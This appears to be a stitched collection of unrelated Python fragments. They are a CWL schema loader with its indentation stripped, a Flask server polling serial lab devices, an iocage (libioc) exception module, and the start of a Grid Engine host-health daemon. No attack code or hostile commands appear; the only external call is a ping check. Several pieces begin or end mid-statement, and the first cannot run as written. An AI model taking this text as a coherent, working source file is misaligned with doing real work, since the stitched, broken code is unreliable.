baseuri,
loadingOptions,
)
except ValidationException as e:
_errors__.append(
ValidationException(
"the `envName` field is not valid because:",
SourceLine(_doc, "envName", str),
[e],
)
)
try:
envValue = load_field(
_doc.get("envValue"),
union_of_strtype_or_ExpressionLoader,
baseuri,
loadingOptions,
)
except ValidationException as e:
_errors__.append(
ValidationException(
"the `envValue` field is not valid because:",
SourceLine(_doc, "envValue", str),
[e],
)
)
extension_fields: Dict[str, Any] = {}
for k in _doc.keys():
if k not in cls.attrs:
if ":" in k:
ex = expand_url(
k, "", loadingOptions, scoped_id=False, vocab_term=False
)
extension_fields[ex] = _doc[k]
else:
_errors__.append(
ValidationException(
"invalid field `{}`, expected one of: `envName`, `envValue`".format(
k
),
SourceLine(_doc, k, str),
)
)
break
if _errors__:
raise ValidationException("Trying 'EnvironmentDef'", None, _errors__)
return cls(
envName=envName,
envValue=envValue,
extension_fields=extension_fields,
loadingOptions=loadingOptions,
)
def save(
self, top: bool = False, base_url: str = "", relative_uris: bool = True
) -> Dict[str, Any]:
r: Dict[str, Any] = {}
for ef in self.extension_fields:
r[prefix_url(ef, self.loadingOptions.vocab)] = self.extension_fields[ef]
if self.envName is not None:
r["envName"] = save(
self.envName, top=False, base_url=base_url, relative_uris=relative_uris
)
if self.envValue is not None:
r["envValue"] = save(
self.envValue, top=False, base_url=base_url, relative_uris=relative_uris
)
# top refers to the directory level
if top:
if self.loadingOptions.namespaces:
r["$namespaces"] = self.loadingOptions.namespaces
if self.loadingOptions.schemas:
r["$schemas"] = self.loadingOptions.schemas
return r
attrs = frozenset(["envName", "envValue"])
class CommandLineBinding(InputBinding):
"""
When listed under `inputBinding` in the input schema, the term
"value" refers to the the corresponding value in the input object. For
binding objects listed in `CommandLineTool.arguments`, the term "value"
refers to the effective value after evaluating `valueFrom`.
The binding behavior when building the command line depends on the data
type of the value. If there is a mismatch between the type described by
the input schema and the effective value, such as resulting from an
expression evaluation, an implementation must use the data type of the
effective value.
- **string**: Add `prefix` and the string to the command line.
- **number**: Add `prefix` and decimal representation to command line.
- **boolean**: If true, add `prefix` to the command line. If false, add
nothing.
- **File**: Add `prefix` and the value of
[`File.path`](#File) to the command line.
- **Directory**: Add `prefix` and the value of
[`Directory.path`](#Directory) to the command line.
- **array**: If `itemSeparator` is specified, add `prefix` and the join
the array into a single string with `itemSeparator` separating the
items. Otherwise first add `prefix`, then recursively process
individual elements.
If the array is empty, it does not add anything to command line.
- **object**: Add `prefix` only, and recursively add object fields for
which `inputBinding` is specified.
- **null**: Add nothing.
"""
def __init__(
self,
loadContents: Optional[Any] = None,
position: Optional[Any] = None,
prefix: Optional[Any] = None,
separate: Optional[Any] = None,
itemSeparator: Optional[Any] = None,
valueFrom: Optional[Any] = None,
shellQuote: Optional[Any] = None,
extension_fields: Optional[Dict[str, Any]] = None,
loadingOptions: Optional[LoadingOptions] = None,
) -> None:
if extension_fields:
self.extension_fields | |
<gh_stars>1-10
import sys
from multiprocessing import Process, Pipe
import threading
import json
import queue
import time
from datetime import datetime
from collections import deque
# import logging
from flask import Flask, request
import numpy as np
from .DeviceDriver import driver_mapping
from .SerialCOM import *
from .DeviceFinder import *
if 'Windows' not in myplatform:
from ftd2xx.ftd2xx import DeviceError
class DeviceManager(object):
""" Handles sending/receiving messages for each device """
def __init__(self, serial_number, driver, com, max_polling_rate=50.0):
self._serial_number = serial_number
self._driver = driver
self._com = com
# the generic query message which is sent every time the user queries the device
self._query_message = {}
self._query_device_data = {} # some devices need this to translate the response back
# device's current values (response to query command)
self._current_values = {}
# polling rate for this device
self._polling_rate = 0
self._com_times = deque(maxlen=20)
self._polling_rate_max = max_polling_rate # Hz
self._set_command_queue = queue.Queue()
self._terminate = False
@property
def driver(self):
return self._driver
@property
def port(self):
return self._com.port
@property
def polling_rate(self):
return self._polling_rate
@property
def polling_rate_max(self):
return self._polling_rate_max
@polling_rate_max.setter
def polling_rate_max(self, polling_rate_max):
self._polling_rate_max = polling_rate_max
@property
def current_values(self):
return self._current_values
@property
def serial_number(self):
return self._serial_number
@property
def query_message(self):
return self._query_message
@query_message.setter
def query_message(self, device_data):
device_id = device_data['device_id']
self._query_device_data[device_id] = device_data
self._query_message[device_id] = self._driver.translate_gui_to_device(device_data)
def add_command_to_queue(self, cmd):
self._set_command_queue.put(cmd)
def run(self):
while not self._terminate:
t1 = datetime.now()
self._waiting_for_resp = True
if not self._set_command_queue.empty():
# try to send the command to the device
cmd = self._set_command_queue.get_nowait()
msgs = self._driver.translate_gui_to_device(cmd)
# print(msgs)
for msg in msgs:
# this takes some time
try:
device_response = self._com.send_message(msg)
except Exception as e:
# print('Unable to send set message! Exception: {}'.format(e))
device_response = 'Error, got exception {}'.format(e)
else:
# update the device's current values
# this could take some time
if self._query_message is not None:
for device_id, query_message in self._query_message.items():
com_resp_list = []
for msg in query_message:
try:
com_resp = self._com.send_message(msg)
com_resp_list.append(com_resp)
except Exception as e:
com_resp_list.append(None)
try:
resp = self._driver.translate_device_to_gui(
com_resp_list, self._query_device_data[device_id])
except:
continue
# add additional info to be shown in the GUI
resp['timestamp'] = time.time()
resp['polling_rate'] = self._polling_rate
self._current_values[device_id] = resp
t2 = datetime.now()
delta = (t2 - t1).total_seconds()
# check if elapsed time is < 1/maximum polling rate. If true, sleep for the difference
if 1.0 > self._polling_rate_max * delta:
time.sleep(1.0 / self._polling_rate_max - delta)
self._com_times.append((datetime.now() - t1).total_seconds())
self.update_polling_rate()
self._com.close()
def update_polling_rate(self):
self._polling_rate = 1.0 / np.mean(self._com_times)
def terminate(self):
self._terminate = True
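# Hedged sketch (never called; the serial number, port and driver key are placeholders):
# shows how a DeviceManager is wired to a SerialCOM and a device driver, mirroring what
# listen_to_pipe() does further below when the watchdog reports a newly attached device.
def _example_device_manager_wiring(serial_number, port_name, driver_key):
    entry = driver_mapping[driver_key]
    # open the serial connection with the driver's baud rate
    com = SerialCOM(arduino_id=serial_number,
                    port_name=port_name,
                    baud_rate=entry["baud_rate"],
                    timeout=1.0)
    # wrap it in a DeviceManager and poll it from a background thread
    device = DeviceManager(serial_number, entry["driver"](), com,
                           max_polling_rate=entry.get("max_polling_rate", 50))
    worker = threading.Thread(target=device.run)
    worker.start()
    return device, worker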
def serial_watchdog(com_pipe, debug, port_identifiers):
"""
Function to be called as a process. Watches the serial ports and looks for devices plugged in
or removed.
Underscore at beginning prevents flask_classy from making it a route in the Flask server.
"""
_keep_communicating2 = True
_com_freq = 2.0 # (Hz)
_com_period = 1.0 / _com_freq # (s)
_debug = debug
if _debug:
print(port_identifiers)
serial_finder = SerialDeviceFinder(port_identifiers)
finder_list = [serial_finder]
if "Windows" not in myplatform:
ftdi_finder = FTDIDeviceFinder(port_identifiers)
finder_list.append(ftdi_finder)
while _keep_communicating2:
try:
# Do the timing of this process:
_thread_start_time = time.time()
if com_pipe.poll():
_in_message = com_pipe.recv()
if _in_message[0] == "com_period":
_com_period = _in_message[1]
elif _in_message[0] == "shutdown":
break
elif _in_message[0] == "port_identifiers":
_port_identifiers = _in_message[1]
# update each finder's identifier list
for finder in finder_list:
finder.identifiers = _port_identifiers
elif _in_message[0] == "debug":
_debug = _in_message[1]
_device_added = False
_device_removed = False
_finder_info = {}
for finder in finder_list:
_finder_info[finder.name] = finder.find_devices()
if _debug:
print(_finder_info)
if _finder_info[finder.name]['added'] != {}:
_device_added = True
if _finder_info[finder.name]['obsolete']:
_device_removed = True
if _device_added or _device_removed:
# If something has changed:
if _debug:
pass # need to update this block
# print("Updated List:")
# for _key, item in _current_ports_by_ids.items():
# print ("{} #{} at port {}".format(item["identifier"], _key, item["port"]))
pipe_message = ["updated_list", _finder_info]
com_pipe.send(pipe_message)
# Do the timing of this process:
_sleepy_time = _com_period - time.time() + _thread_start_time
if _sleepy_time > 0.0:
if _debug:
print("Watchdog alive, sleeping for {} s.".format(_sleepy_time))
time.sleep(_sleepy_time)
except KeyboardInterrupt:
print("Watchdog got keyboard interrupt")
com_pipe.send("shutdown")
break
# /===============================\
# | |
# | Flask server |
# | |
# \===============================/
app = Flask(__name__)
# disable flask output messages (makes server easier to debug)
# log = logging.getLogger('werkzeug')
# log.setLevel(logging.ERROR)
_mydebug = False
_pipe_server, pipe_serial_watcher = Pipe()
_watch_proc = Process(target=serial_watchdog,
args=(pipe_serial_watcher, _mydebug, driver_mapping))
_watch_proc.daemon = True
_keep_communicating = False
_initialized = False
_devices = {}
_threads = {}
_ftdi_serial_port_mapping = {} # gui uses serial numbers, server uses ports
_current_responses = {}
@app.route("/initialize/")
def initialize():
global _initialized
global _keep_communicating
if _initialized:
return "Server has already been initialized"
else:
_keep_communicating = True
threading.Timer(0.1, listen_to_pipe).start()
time.sleep(0.2) # Need to wait a little for the thread to be ready to receive initial info of watchdog
_initialized = True
if not _watch_proc.is_alive():
_watch_proc.start()
return "Initializing Control System Server services...Started the watchdog process."
else:
return "Initializing Control System Server services...There was already a watchdog process running!"
@app.route("/device/set", methods=['GET', 'POST'])
def set_value_on_device():
# Load the data stream
device_data = json.loads(request.form['data'])
device_data["set"] = True
# For reference: This is the message from the GUI:
# device_data = {'device_driver': device_driver_name,
# 'device_id': device_id,
# 'locked_by_server': False,
# 'channel_ids': [channel_ids],
# 'precisions': [precisions],
# 'values': [values],
# 'data_types': [types]}
# --- Handle the various id numbers:
# Server side, we use <vid>_<pid>_<id> for now, but a better system is necessary!
# Some devices are master/slave (like the Matsusada CO series)
# For those we need to send commands to the master only
# e.g. if serial number is XXXXXX_2, we look for device XXXXXX, and
# device data should then use only the '2' as the id.
client_side_device_id = device_data['device_id']
device_id_parts = client_side_device_id.split("_")
master_device_id = device_id_parts[0]
driver_name = device_data["device_driver"]
if driver_name not in driver_mapping.keys():
        # device not found in driver list
return "ERROR: Device Driver not found in driver_mapping"
else:
if len(device_id_parts) > 1:
slave_device_id = device_id_parts[1]
device_data['device_id'] = device_id_parts[1]
else:
slave_device_id = master_device_id
vidpid = driver_mapping[driver_name]["vid_pid"]
server_side_device_id = "{}_{}_{}".format(int(vidpid[0]), int(vidpid[1]), master_device_id)
# print("vidpid_id:", server_side_device_id)
device_data['device_id'] = slave_device_id
_devices[server_side_device_id].add_command_to_queue(device_data)
# set_cmd['device_id'] = old_device_id
'''
if _mydebug:
print("The message to the device is: {}".format(msg)
try:
print(msg)
for cmd in msg:
device_response = _comms[port_id].send_message(cmd)
except Exception as e:
device_response = "Error, exception happened: {}".format(e)
return json.dumps(device_response)
'''
return 'Command sent to device'
@app.route("/device/query", methods=['GET', 'POST'])
def query_device():
# Load the data stream
data = json.loads(request.form['data'])
devices_responses = {}
for i, device_data in enumerate(data):
device_data['set'] = False
# --- Handle the various id numbers:
# Server side, we use <vid>_<pid>_<id> for now, but a better system is necessary!
# Some devices are master/slave (like the Matsusada CO series)
# For those we need to send commands to the master only
# e.g. if serial number is XXXXXX_2, we look for device XXXXXX, and
# device data should then use only the '2' as the id.
client_side_device_id = device_data['device_id']
device_id_parts = client_side_device_id.split("_")
master_device_id = device_id_parts[0]
driver_name = device_data["device_driver"]
if driver_name not in driver_mapping.keys():
            # device not found in driver list
devices_responses[client_side_device_id] = "ERROR: Device Driver not found in driver_mapping"
else:
if len(device_id_parts) > 1:
slave_device_id = device_id_parts[1]
device_data['device_id'] = device_id_parts[1]
else:
slave_device_id = master_device_id
vidpid = driver_mapping[driver_name]["vid_pid"]
server_side_device_id = "{}_{}_{}".format(int(vidpid[0]), int(vidpid[1]), master_device_id)
# print("vidpid_id:", server_side_device_id)
try:
_devices[server_side_device_id].query_message = device_data
devices_responses[client_side_device_id] = \
_devices[server_side_device_id].current_values[slave_device_id]
except KeyError:
# device not found on server
devices_responses[client_side_device_id] = "ERROR: Device not found on server"
global _current_responses
_current_responses = json.dumps(devices_responses)
return _current_responses
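# Hedged client-side sketch (host, port and ids are placeholders): the GUI posts a JSON
# list of device_data dicts under the form key 'data', e.g.
#   payload = [{'device_driver': 'SomeDriver', 'device_id': '12345',
#               'locked_by_server': False, 'channel_ids': ['v1'], 'precisions': [2],
#               'values': [None], 'data_types': ['float']}]
#   requests.post('http://localhost:5000/device/query',
#                 data={'data': json.dumps(payload)}).json()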
@app.route("/device/active/")
def all_devices():
global _devices
ports = {}
for _id, dm in _devices.items():
ports[_id] = [dm.port, dm.polling_rate, dm.driver.get_driver_name()]
return json.dumps(ports)
def listen_to_pipe():
global _devices
global _threads
global _ftdi_serial_port_mapping
global _keep_communicating
if _pipe_server.poll(1):
gui_message = _pipe_server.recv()
if gui_message == 'shutdown':
_keep_communicating = False
shutdown()
if gui_message[0] == "updated_list":
if _mydebug:
print("Updating ports/ids in main server")
message_info = gui_message[1]
for name, finder_result in message_info.items():
if name == 'serial':
# for key, val in finder_result['current'].items():
# continue
_obsolete = finder_result['obsolete']
_added = finder_result['added']
for _key in _obsolete.keys():
# gracefully remove devices/threads
print('Shutting down device {}'.format(_key))
_devices[_key].terminate()
_threads[_key].join()
if not _threads[_key].is_alive():
print('Removing device {}'.format(_key))
del _devices[_key]
del _threads[_key]
for _key, _port_info in _added.items():
# add devices/threads
_baud_rate = driver_mapping[_port_info["identifier"]]["baud_rate"]
                        print('Adding device {} on port {} with baud rate {}'.format(_key, _port_info, _baud_rate))
com = SerialCOM(arduino_id=_key,
port_name=_port_info["port"],
baud_rate=_baud_rate,
timeout=1.0)
drv = driver_mapping[_port_info["identifier"]]['driver']()
mpr = driver_mapping[_port_info["identifier"]].get('max_polling_rate', 50)
_devices[_key] = DeviceManager(_key, drv, com, max_polling_rate=mpr)
_threads[_key] = threading.Thread(target=_devices[_key].run)
_threads[_key].start()
elif name | |
# Copyright (c) 2017-2019, <NAME>
# Copyright (c) 2014-2018, iocage
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted providing that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Collection of iocage errors."""
import typing
import uuid
# MyPy
import libzfs # noqa: F401
import libioc.Types # noqa: F401
import libioc.Logger
class IocException(Exception):
"""A well-known exception raised by liblibioc."""
def __init__(
self,
message: str,
level: str="error",
silent: bool=False,
append_warning: bool=False,
warning: typing.Optional[str]=None,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
if (logger is not None) and (silent is False):
logger.__getattribute__(level)(message)
if (append_warning is True) and (warning is not None):
logger.warn(warning)
else:
super().__init__(message)
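# Illustrative only (the Logger instance and the message are hypothetical):
# when a logger is passed and silent is False, the message is dispatched to
# the log method named by ``level`` instead of being attached to the
# exception text.
#
#   log = libioc.Logger.Logger()
#   raise IocException("zpool is busy", level="warn", logger=log)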
# Missing Features
class MissingFeature(IocException, NotImplementedError):
"""Raised when an iocage feature is not fully implemented yet."""
def __init__(
self,
feature_name: str,
plural: bool=False,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
message = (
f"Missing Feature: '{feature_name}' "
f"{'are' if plural is True else 'is'} not implemented yet"
)
IocException.__init__(self, message=message)
# Jails
class JailException(IocException):
"""Raised when an exception related to a jail occurs."""
jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
message: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
self.jail = jail
IocException.__init__(self, message=message, logger=logger)
class JailDoesNotExist(JailException):
"""Raised when the jail does not exist."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail '{jail.humanreadable_name}' does not exist"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailAlreadyExists(IocException):
"""Raised when the jail already exists."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail '{jail.humanreadable_name}' already exists"
IocException.__init__(self, message=msg, logger=logger)
class JailNotRunning(IocException):
"""Raised when the jail is not running."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail '{jail.humanreadable_name}' is not running"
IocException.__init__(self, message=msg, logger=logger)
class JailAlreadyRunning(IocException):
"""Raised when the jail is already running."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail '{jail.humanreadable_name}' is already running"
IocException.__init__(self, message=msg, logger=logger)
class JailNotFound(IocException):
"""Raised when the jail was not found."""
def __init__(
self,
text: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"No jail matching '{text}' was found"
IocException.__init__(self, message=msg, logger=logger)
class JailNotSupplied(IocException):
"""Raised when no jail was supplied."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "No jail supplied"
IocException.__init__(self, message=msg, logger=logger)
class JailUnknownIdentifier(IocException):
"""Raised when the jail has an unknown identifier."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "The jail has no identifier yet"
IocException.__init__(self, message=msg, logger=logger)
class JailBackendMissing(IocException):
"""Raised when the jails backend was not found."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "The jail backend is unknown"
IocException.__init__(self, message=msg, logger=logger)
class JailIsTemplate(JailException):
"""Raised when the jail is a template but should not be."""
jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"The jail '{jail.name}' is a template"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailNotTemplate(JailException):
"""Raised when the jail is no template but should be one."""
jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"The jail '{jail.full_name}' is not a template"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailHookFailed(JailException):
"""Raised when the jail could not be launched."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
hook: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
self.hook = hook
msg = f"Jail {jail.full_name} hook {hook} failed"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailLaunchFailed(JailException):
"""Raised when the jail could not be launched."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
reason: typing.Optional[str]=None,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Launching jail {jail.full_name} failed"
if reason is not None:
msg += f": {reason}"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailDestructionFailed(JailException):
"""Raised when the jail could not be destroyed."""
jail: 'libioc.Jail.JailGenerator'
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Destroying jail {jail.full_name} failed"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
class JailCommandFailed(IocException):
"""Raised when a jail command fails with an exit code > 0."""
returncode: int
def __init__(
self,
returncode: int,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
self.returncode = returncode
msg = f"Jail command exited with {returncode}"
IocException.__init__(self, message=msg, logger=logger)
class JailExecutionAborted(JailException):
"""Raised when a jail command fails with an exit code > 0."""
def __init__(
self,
jail: 'libioc.Jail.JailGenerator',
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Jail execution of {jail.humanreadable_name} aborted"
JailException.__init__(self, message=msg, jail=jail, logger=logger)
# Jail State
class JailStateUpdateFailed(IocException):
"""Raised when a JLS query failed."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "JLS query failed"
IocException.__init__(self, message=msg, logger=logger)
# Jail Fstab
class VirtualFstabLineHasNoRealIndex(IocException):
"""Raised when attempting to access the index of a virtual fstab line."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = "The virtual fstab line does not have a real list index"
IocException.__init__(self, message=msg, logger=logger)
class FstabDestinationExists(IocException):
"""Raised when the destination directory does not exist."""
def __init__(
self,
mountpoint: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"The mountpoint {mountpoint} already exists in the fstab file"
IocException.__init__(self, message=msg, logger=logger)
# Security
class SecurityViolation(IocException):
"""Raised when iocage has security concerns."""
def __init__(
self,
reason: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Security violation: {reason}"
IocException.__init__(self, message=msg, logger=logger)
class InsecureJailPath(SecurityViolation):
"""Raised when a a path points outside of a resource."""
def __init__(
self,
path: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Insecure path {path} jail escape attempt"
SecurityViolation.__init__(self, reason=msg)
class SecurityViolationConfigJailEscape(SecurityViolation):
"""Raised when a file symlinks to a location outside of the jail."""
def __init__(
self,
file: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"The file {file} references a file outsite of the jail resource"
SecurityViolation.__init__(self, reason=msg)
class IllegalArchiveContent(IocException):
"""Raised when a release asset archive contains malicious content."""
def __init__(
self,
asset_name: str,
reason: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = f"Asset {asset_name} contains illegal files - {reason}"
super().__init__(message=msg, logger=logger)
# JailConfig
class JailConfigError(IocException):
"""Raised when a general configuration error occurs."""
pass
class InvalidJailName(JailConfigError):
"""Raised when a jail has an invalid name."""
def __init__(
self,
name: str,
invalid_characters: typing.Optional[typing.List[str]]=None,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
msg = (
f"Invalid jail name '{name}': "
"Names may not begin or end with special characters, "
"but may contain alphanumeric and allowed special characters "
"! ^ - _ ( ) [ ] { } < > , ."
)
if invalid_characters is not None:
msg += ", but got " + str("".join(invalid_characters) + "")
super().__init__(message=msg, logger=logger)
class JailConigZFSIsNotAllowed(JailConfigError):
"""Raised when a jail is not allowed to use ZFS shares."""
def __init__(
self,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
        msg = (
            "jail_zfs is disabled "
            "although jail_zfs_dataset is configured"
        )
super().__init__(message=msg, logger=logger)
class InvalidJailConfigValue(JailConfigError, ValueError):
"""Raised when a jail configuration value is invalid."""
def __init__(
self,
property_name: str,
jail: typing.Optional['libioc.Jail.JailGenerator']=None,
reason: typing.Optional[str]=None,
logger: typing.Optional['libioc.Logger.Logger']=None,
level: str="error"
) -> None:
msg = f"Invalid value for property '{property_name}'"
if jail is not None:
msg += f" of jail {jail.humanreadable_name}"
if reason is not None:
msg += f": {reason}"
super().__init__(message=msg, logger=logger, level=level)
class InvalidJailConfigAddress(InvalidJailConfigValue):
"""Raised when a jail address is invalid."""
def __init__(
self,
value: str,
property_name: str,
jail: typing.Optional['libioc.Jail.JailGenerator']=None,
logger: typing.Optional['libioc.Logger.Logger']=None,
level: str="error"
) -> None:
reason = f"expected \"<nic>|<address>\" but got \"{value}\""
super().__init__(
property_name=property_name,
jail=jail,
reason=reason,
level=level,
logger=logger
)
class InvalidMacAddress(IocException, ValueError):
"""Raised when a jail MAC address is invalid."""
def __init__(
self,
mac_address: str,
logger: typing.Optional['libioc.Logger.Logger']=None
) -> None:
reason = f"invalid mac address: \"{mac_address}\""
IocException.__init__(
self,
message=reason
)
class ResourceLimitUnknown(IocException, KeyError):
"""Raised when a resource limit has | |
<reponame>nirmalya-broad/PatHCap_PL
#!/usr/bin/env python
# The Broad Institute
# SOFTWARE COPYRIGHT NOTICE AGREEMENT
# This software and its documentation are copyright 2016 by the
# Broad Institute/Massachusetts Institute of Technology. All rights are
# reserved.
# This software is supplied without any warranty or guaranteed support
# whatsoever. Neither the Broad Institute nor MIT can be responsible for its
# use, misuse, or functionality.
"""
Daemon program that examines Grid Engine jobs in order to determine if any hosts are unhealthy.
A list of jobs for all users (by default) is captured, and the following conditions are reported:
- Host for a running job does not respond to ping
- Host for a running job has a queue in unreachable stage
- Job has been in transfer state too long
- Job has been in deletion stage too long
- Job is using more CPU than it has requested
- Job appears to be cpu-starved; i.e. cpu-time/run-time is small
Note that jobs can appear cpu-starved for legitimate reasons. Therefore a host must have multiple cpu-starved jobs
to be reported, and if a job array has cpu-starved jobs on multiple hosts, it is not considered to be a problem.
See the options below to control the thresholds for these conditions.
Note that files containing lists of users, hosts, jobs are re-read every time status is checked, so these files
can be changed without having to restart the daemon.
Note that files containing lists may have blank lines, and comments introduced with # and continuing to EOL.
"""
import argparse
import collections
import itertools
import logging
import signal
import subprocess
import sys
import time
import traceback
import email_notify
import uge_functions
def read_list_file(path):
"""
Parse a file containing one element per line, optionally with line comments starting with '#'
:param path: file to be read
:return: list of elements, with comments and newlines removed
"""
with open(path, "r") as fIn:
ret = [line.rstrip("\n").split("#", 1)[0].strip() for line in fIn.readlines()]
return [line for line in ret if len(line) > 0]
def combine_option_lists(list1, list2, default_list=None):
if default_list is None:
default_list = []
if list1 is None:
if list2 is None:
if default_list is None:
return []
else:
return default_list
else:
return list2
elif list2 is None:
return list1
else:
return list1 + list2
if sys.platform == "darwin":
wait_flag = "W"
else:
wait_flag = "w"
dev_null = open("/dev/null", "w")
def ping(host):
"""
:arg host: host to be pinged
:return: True if host responded to ping
"""
# Send 1 packet and wait up to 3 seconds for a response.
return subprocess.call(["ping", "-c", "1", "-" + wait_flag, "3", host],
stdout=dev_null, stderr=subprocess.STDOUT) == 0
def ping_hosts(hosts_to_ping, dct_no_ping_hosts):
"""
:param hosts_to_ping: set of hosts to be pinged
:param dct_no_ping_hosts: key: host; value: first time host failed ping. Updated as appropriate
:return: list of hosts that newly failed ping
"""
ret = []
for host in hosts_to_ping:
if ping(host):
if host in dct_no_ping_hosts:
del dct_no_ping_hosts[host]
elif host not in dct_no_ping_hosts:
ret.append(host)
dct_no_ping_hosts[host] = time.time()
return ret
def check_host_queue_state(hosts, dct_bad_state_hosts):
"""
Query queues on given hosts
:param hosts: set of hosts to be queried
:param dct_bad_state_hosts: key: host, value: first time host had bad state. Updated as appropriate
:return: list of hosts that newly have bad state
"""
ret = []
current_bad_state_hosts = uge_functions.get_hosts_with_unreachable_queues(hosts)
for host in hosts:
if host in current_bad_state_hosts:
if host not in dct_bad_state_hosts:
ret.append(host)
dct_bad_state_hosts[host] = time.time()
elif host in dct_bad_state_hosts:
# problem has cleared
del dct_bad_state_hosts[host]
return ret
def is_transfer_state(state):
return state.find("t") != -1
def is_delete_state(state):
return state.find("d") != -1
def is_running_state(state):
return state == "r"
ProblemState = collections.namedtuple("ProblemState", ["host", "state", "first_seen_time", "reported_time", "user",
"start_time"])
def update_strange_jobs(dct_strange_state_jobs, job, state, job_details=None):
prev_problem_state = dct_strange_state_jobs.get(job.job_and_task)
if prev_problem_state is None or prev_problem_state.state != state:
# if state has changed, treat this as the old problem being cleared
if job_details is not None:
start_time_secs = job_details.start_time_secs
else:
start_time_secs = None
dct_strange_state_jobs[job.job_and_task] = \
ProblemState(job.host, state, time.time(), None, job.user, start_time_secs)
def cpu_starved(job_detail, wallclock_threshold_minutes, cpu_fraction):
if job_detail.start_time_secs is None:
return None
wallclock_secs = time.time() - job_detail.start_time_secs
if wallclock_secs < wallclock_threshold_minutes * 60:
# job has not been running long enough
return None
elif job_detail.cpu_secs is None:
logging.log_message("Could not get cpu time for ", job_detail.job_and_task)
return 0
else:
fraction = job_detail.cpu_secs / float(wallclock_secs)
if fraction <= cpu_fraction:
return fraction
else:
return None
def cpu_hog(job_detail, hog_threshold):
if job_detail.start_time_secs is None:
return None
wallclock_secs = time.time() - job_detail.start_time_secs
if job_detail.cpu_secs is None:
logging.log_message("Could not get cpu time for ", job_detail.job_and_task)
return 0
elif job_detail.slots is None:
logging.log_message("Could not get slots for ", job_detail)
else:
hog_amount = (job_detail.cpu_secs / float(wallclock_secs)) - job_detail.slots
if hog_amount >= hog_threshold:
return hog_amount
else:
return None
def remove_strange_job(dct_strange_state_jobs, strange_job):
if strange_job in dct_strange_state_jobs:
del dct_strange_state_jobs[strange_job]
def count_starved_jobs_by_host(dct_strange_state_jobs,
job_per_host_verbosity_threshold=None,
host_per_job_verbosity_threshold=None):
# Count the unique jobs on a host that are cpu-starved.
# Multiple tasks for the same job on the same host count as 1.
# The idea is that a job could look cpu-starved if it is waiting for something, e.g. downloading something
# over the network. If a host is in trouble, there should be multiple jobs that appear cpu-starved.
# Also, count the number of hosts on which one of the tasks for a job is cpu-starved. If there are several,
# it is probably the job and not a host in trouble.
# returns tuple(dict(host=>count of unique starved jobs), dict(job_id=>count of unique hosts on which a task for that job is starved)
